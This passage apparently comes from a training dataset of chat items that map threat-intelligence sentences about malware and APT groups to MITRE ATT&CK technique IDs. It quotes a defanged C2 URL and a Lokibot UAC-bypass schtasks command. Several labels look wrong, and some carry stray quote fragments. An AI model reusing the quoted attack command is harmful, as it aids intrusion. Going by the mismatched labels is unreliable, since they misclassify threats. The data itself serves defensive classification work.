Hidden." }, { "role": "assistant", "content": "T1564.001 - Hide Artifacts: Hidden Files and Directories" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The assembly code used to create the shellcode can be obtained from: https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_api.asm https://github.com/rapid7/metasploit-framework/blob/master/external/source/shellcode/windows/x86/src/block/block_reverse_http.asm The purpose of the shellcode is to obtain additional shellcode to execute using an HTTP request to the URL “hxxp://45.76.128[.]165:4443/0w0O6”" }, { "role": "assistant", "content": "T1071 - Application Layer Protocol', 'T1064 - Scripting" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "LazyScripter has leveraged dynamic DNS providers for C2 communications." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first backdoor that the TeleBots group relied heavily on was Python/TeleBot.A, which was rewritten from Python in the Rust programming language. The functionality remains the same: it is a standard backdoor that uses the Telegram Bot API in order to receive commands from, and send responses to, the malware operator" }, { "role": "assistant", "content": "T1102.002 - Bidirectional Communication" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SQLRat relies on users clicking on an embedded image to execute the scripts." }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Mis-Type has used `cmd.exe` to run commands on a compromised host." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "is a Volume Boot Record (VBR) bootkit that uses the VBR to maintain persistence." }, { "role": "assistant", "content": "T1542.003 - Bootkit" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The first 11 bytes of the received buffer are encrypted with the XOR algorithm" }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire has a limited number of built-in modules for exploiting remote SMB, JBoss, and Jenkins servers." }, { "role": "assistant", "content": "T1210 - Exploitation of Remote Services" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CookieMiner can steal saved usernames and passwords in Chrome as well as credit card credentials." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "3, 2019): On May 16, 2019 FireEye's Advanced Practices team attributed the remaining \"suspected APT33 activity\" (referred to as GroupB in this blog post) to APT33, operating at the behest of the Iranian government. The actor leveraged this persistence mechanism to download and execute OS-dependent variants of the publicly available .NET POSHC2 backdoor as well as a newly identified PowerShell-based implant self-named POWERTON. Of note, Advanced Practices separately established that APT33 began using POSHC2 as of at least July 2, 2018, and continued to use it throughout the duration of 2018. At one point in late-August, after the POSHC2 kill date, the adversary used RULER.HOMEPAGE to directly download POWERTON, bypassing the intermediary stages previously observed. FireEye Intelligence has previously reported that APT33 has ties to destructive malware, and they pose a heightened risk to critical infrastructure. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Custom Backdoor: POWERTON . POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office365. At FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet" }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "PowerSploit contains a collection of Exfiltration modules that can access data from local files, volumes, and processes." }, { "role": "assistant", "content": "T1005 - Data from Local System" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The code injected into an msiexec.exe sends a beacon signal to the CnC server and awaits commands" }, { "role": "assistant", "content": "T1218.007 - Signed Binary Proxy Execution: Msiexec" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NanHaiShu uses DNS for the C2 communications." }, { "role": "assistant", "content": "T1071.004 - Application Layer Protocol: DNS" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "CHOPSTICK encrypts C2 communications with RC4." }, { "role": "assistant", "content": "T1573.001 - Symmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "HermeticWizard has the ability to create a new process using `rundll32`." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "AppleSeed has the ability to search for .txt, .ppt, .hwp, .pdf, and .doc files in specified directories." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "3PARA RAT has a command to set certain attributes such as creation/modification timestamps on files." }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "After decoding and decrypting with the XOR key “DARKMATTER” it gets the real C&C URL ‘banhamm.com‘." }, { "role": "assistant", "content": "T1140 - Deobfuscate/Decode Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SideTwist has exfiltrated data over its C2 channel." }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Machete has a component to check for running processes to look for web browsers." }, { "role": "assistant", "content": "T1057 - Process Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has the capability to communicate over a backup channel via plus.google.com." }, { "role": "assistant", "content": "T1008 - Fallback Channels" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The core component will check whether it is located in the %temp%\\[appname] directory, otherwise it copies itself to %temp%\\[appname]\\[appname] and set the file attribute to hidden" }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NCCIC observed multiple methods used by NotPetya to propagate across a network. The first and—in most cases—most effective method, uses a modified version of the Mimikatz tool to steal the user’s Windows credentials. The cyber threat actor can then use the stolen credentials, along with the native Windows Management Instrumentation Command Line (WMIC) tool or the Microsoft SysInternals utility, psexec.exe, to access other systems on the network. Another method for propagation uses the EternalBlue exploit tool to target unpatched systems running a vulnerable version of SMBv1" }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "1) Suckfly's first step was to identify a user to target so the attackers could attempt their initial breach into the e-commerce company's internal network. 2) On April 22, 2015, Suckfly exploited a vulnerability on the targeted employee's operating system (Windows) that allowed the attackers to bypass the User Account Control and install the Nidiran back door to provide access for their attack. 3) After the attackers successfully exploited the employee’s system, they gained access to the e-commerce company's internal network. To do this the attackers used a signed credential-dumping tool to obtain the victim's account credentials. With the account credentials, the attackers were able to access the victim's account and navigate the internal corporate network as though they were the employee. 4) On April 27, the attackers scanned the corporate internal network for hosts with ports 8080, 5900, and 40 open. Ports 8080 and 5900 are common ports used with legitimate protocols, but can be abused by attackers when they are not secured. Based on Suckfly scanning for common ports, it’s clear that the group was looking to expand its foothold on the e-commerce company's internal network. 5) The attackers’ final step was to exfiltrate data off the victim’s network and onto Suckfly’s infrastructure. While we know that the attackers used the Nidiran back door to steal information about the compromised organization, we do not know if Suckfly was successful in stealing other information" }, { "role": "assistant", "content": "T1078 - Valid Accounts" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "For every hard-coded TCP port used to communicate with the C&C servers, the malware creates a rule in Netfilter — the Linux kernel firewall — using the iptc_insert_entry() function from libiptc1 to allow output communication to it" }, { "role": "assistant", "content": "T1562.004 - Impair Defenses: Disable or Modify System Firewall" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The ransomware payload is copied to the ADMIN$ share of a remote system, and Impacket is used to remotely create a Windows Scheduled Task on target systems to execute the payload" }, { "role": "assistant", "content": "T1021.002 - Remote Services: SMB/Windows Admin Shares', 'T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Tonto Team has routed their traffic through an external server in order to obfuscate their location." }, { "role": "assistant", "content": "T1090.002 - External Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Empire can enumerate antivirus software on the target." }, { "role": "assistant", "content": "T1518.001 - Software Discovery: Security Software Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Executive summary . The PROMETHIUM threat actor — active since 2012 — has been exposed multiple times over the past several years.. However, this has not deterred this actor from continuing and expanding their activities. The trojanized setup will install the malware and the legitimate application, which is a good way to disguise its activities. PROMETHIUM has been resilient over the years. We have no evidence that the websites of the real applications were compromised to host the malicious installer. The usage of the HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run registry key has a persistence mechanism that has been replaced by the creation of a service. If it is executed with the \"help\" parameter, it will install a service to execute itself as a service. This has a notable side effect: if rmaserv.exe is executed isolated on a sandbox (so without the parameter), the service is not created. Document search module: Mssqldbserv.xml . This module has been described before in the article here. The purpose of this tool is to parse the hard drive for files with a specific extension and create an archive with these files. SFT file creation routine Using the working directory as a base path, which in this sample case is C:\\DOCUME~1\\<USER>~1\\LOCALS~1\\Temp\\4CA-B25C11-A27BC\\, each selected file will be compressed into the file kr.zp" }, { "role": "assistant", "content": "T1204.002 - User Execution: Malicious File" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EvilBunny's dropper has checked the number of processes and the length and strings of its own file name to identify if the malware is in a sandbox environment." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This shortcut file points to the path of the previously written ‘Applet.cpl’ file" }, { "role": "assistant", "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Cobalt Group has used a JavaScript backdoor that is capable of launching cmd.exe to execute shell commands." }, { "role": "assistant", "content": "T1059 - Command and Scripting Interpreter" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Some Volgmer variants use SSL to encrypt C2 communications." }, { "role": "assistant", "content": "T1573.002 - Asymmetric Cryptography" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "can use HTTP for C2." }, { "role": "assistant", "content": "T1071 - Application Layer Protocol" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "During Operation Sharpshooter, threat actors installed Rising Sun in the Startup folder and disguised it as `mssync.exe`." }, { "role": "assistant", "content": "T1036.005 - Masquerading: Match Legitimate Name or Location" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Grandoreiro can download its second stage from a hardcoded URL within the loader's code." }, { "role": "assistant", "content": "T1105 - Ingress Tool Transfer" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Dragonfly has used a batch script to gather folder and file names from victim hosts." }, { "role": "assistant", "content": "T1083 - File and Directory Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Melcoz has the ability to steal credentials from web browsers." }, { "role": "assistant", "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Squirrelwaffle has been executed using `rundll32.exe`." }, { "role": "assistant", "content": "T1218.011 - Signed Binary Proxy Execution: Rundll32" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The screen capture below shows the decryption function.It then calls the StartAndPatchRegAsm function.This function tries to find the original Microsoft RegAsm executable path" }, { "role": "assistant", "content": "T1113 - Screen Capture" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "removes batch files to reduce fingerprint on the system as well as deletes the CAB file that gets encoded upon infection." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WhisperGate has used the `ExitWindowsEx` API to flush file buffers to disk and stop running processes." }, { "role": "assistant", "content": "T1106 - Native API" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "MegaCortex has used the open-source library, Mbed Crypto, and generated AES keys to carry out the file encryption process." }, { "role": "assistant", "content": "T1486 - Data Encrypted for Impact" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "P.A.S. Webshell has the ability to modify file permissions." }, { "role": "assistant", "content": "T1222.002 - File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Pupy has a module that checks a number of indicators on the system to determine if its running on a virtual machine." }, { "role": "assistant", "content": "T1497.001 - Virtualization/Sandbox Evasion: System Checks" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In response, if the status is OK, then a TOKEN is received from the C2 server that is used to synchronize the activities between the victim’s machine and the C2 server" }, { "role": "assistant", "content": "T1041 - Exfiltration Over C2 Channel" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Backdating, or timestomping, is a technique used by many threat actors which involves the manipulation of the creation timestamps or compilation date of a file in order to thwart analysis attempts (anti-forensics). It is suspected that the creation date of most of the files mentioned in this report were tampered with by the threat actors and backdated to 2016" }, { "role": "assistant", "content": "T1070.006 - Indicator Removal on Host: Timestomp" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Catchamas obtains application windows titles and then determines which windows to perform Screen Capture on." }, { "role": "assistant", "content": "T1010 - Application Window Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Silence has deleted artifacts, including scheduled tasks, communicates files from the C2 and other logs." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Gazer can establish persistence by creating a .lnk file in the Start menu." }, { "role": "assistant", "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "To do this, Tick uses a number of publicly available hacktools such as Mimikatz, GSecdump, and Windows Credential Editor" }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The BRONZE BUTLER uploader or malware the uploader uses \"command\" to delete the RAR archives after they have been exfiltrated." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "SamSam uses custom batch scripts to execute some of its components." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "will sleep until after a date/time value loaded from a .dat file has passed. This allows the RAT to remain dormant until a set date, which could allow a means to regain access if other parts of the actors' toolset are removed from a victim." }, { "role": "assistant", "content": "T1108 - Redundant Access" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ran genuinely-signed executables from Symantec and McAfee which loaded a malicious DLL called rastls.dll." }, { "role": "assistant", "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT37 has used the command-line interface." }, { "role": "assistant", "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WindTail can be delivered as a compressed, encrypted, and encoded payload." }, { "role": "assistant", "content": "T1027 - Obfuscated Files or Information" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "A Threat Group-3390 tool can read and decrypt stored Registry values." }, { "role": "assistant", "content": "T1012 - Query Registry" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used PowerShell scripts to download and execute programs in memory, without writing to disk." }, { "role": "assistant", "content": "T1064 - Scripting', 'T1059.001 - Command and Scripting Interpreter: PowerShell" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "EvilBunny has exploited CVE-2011-4369, a vulnerability in the PRC component in Adobe Reader." }, { "role": "assistant", "content": "T1203 - Exploitation for Client Execution" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Kinsing was executed with an Ubuntu container entry point that runs shell scripts." }, { "role": "assistant", "content": "T1609 - Kubernetes Exec Into Container" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "This time, APT15 opted for a DNS based backdoor: RoyalDNS. The persistence mechanism used by RoyalDNS was achieved through a service called ‘Nwsapagent" }, { "role": "assistant", "content": "T1543.003 - Create or Modify System Process: Windows Service" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "At this stage the malware disables the Windows screen saver, then changes both the desktop wallpaper and the lock screen images to a custom image. These are the pair of identical JPEG and BMP images presenting the logo of Iran’s Railways and the message similar to the one displayed on the platform boards of different railway stations in Iran" }, { "role": "assistant", "content": "T1491.001 - Defacement: Internal Defacement" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In one example, BRONZE UNION actors leveraged initial web shell access on Internet-facing systems to conduct internal reconnaissance, including domain enumeration and network state, via ipconfig, net use, net user, and net view commands" }, { "role": "assistant", "content": "T1018 - Remote System Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "GravityRAT has a feature to list the available services on the system." }, { "role": "assistant", "content": "T1007 - System Service Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Bazar loader files are dual-extension executable files (such as PreviewReport.DOC.exe) signed with fake certificates such as VB CORPORATE PTY. This is consistent with the Trickbot group, which notoriously abuses the trust of certificate authorities by using signed loaders and malware to evade security product detection" }, { "role": "assistant", "content": "T1036.007 - Masquerading: Double File Extension" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "APT1 has used RAR to compress files before moving them outside of the victim network." }, { "role": "assistant", "content": "T1560.001 - Archive Collected Data: Archive via Utility" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "deletes shadow copies from the victim." }, { "role": "assistant", "content": "T1070.004 - Indicator Removal on Host: File Deletion" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "ZIRCONIUM has exploited CVE-2017-0005 for local privilege escalation." }, { "role": "assistant", "content": "T1068 - Exploitation for Privilege Escalation" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "In another engagement, we observed the adversary using Mimikatz (the official signed version) to access credentials for logon (T1003.001: LSASS Memory" }, { "role": "assistant", "content": "T1003.001 - OS Credential Dumping: LSASS Memory" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Lokibot embedded the commands \"schtasks /Run /TN \\Microsoft\\Windows\\DiskCleanup\\SilentCleanup /I\" inside a batch script." }, { "role": "assistant", "content": "T1053.005 - Scheduled Task/Job: Scheduled Task" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "NBTscan can list active users on the system." }, { "role": "assistant", "content": "T1033 - System Owner/User Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "uses the net user command." }, { "role": "assistant", "content": "T1087 - Account Discovery" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The Winnti for Windows HTTP/S C2 mode can make use of a local proxy." }, { "role": "assistant", "content": "T1090.001 - Proxy: Internal Proxy" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "WannaCry attempts to kill processes associated with Exchange, Microsoft SQL Server, and MySQL to make it possible to encrypt their data stores." }, { "role": "assistant", "content": "T1489 - Service Stop" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The button would then lead to the download a RAR archive named Adobe_Flash_Install.rar. This archive was designed to fool the targeted user into infected themselves with a Cobalt Strike implant. Details on the contents of this file are included later in this report" }, { "role": "assistant", "content": "T1204.001 - Malicious Link" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "The file name AcroRD32.exe, a legitimate process name for Adobe's Acrobat Reader, was used by as a name for malware." }, { "role": "assistant", "content": "T1036 - Masquerading" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "Bankshot gathers domain and account names/information through process monitoring." }, { "role": "assistant", "content": "T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account" } ] }, { "messages": [ { "role": "system", "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". " }, { "role": "user", "content": "has used CVE-2014-6324 to escalate privileges." }, { "role": "assistant", "content": "T1068 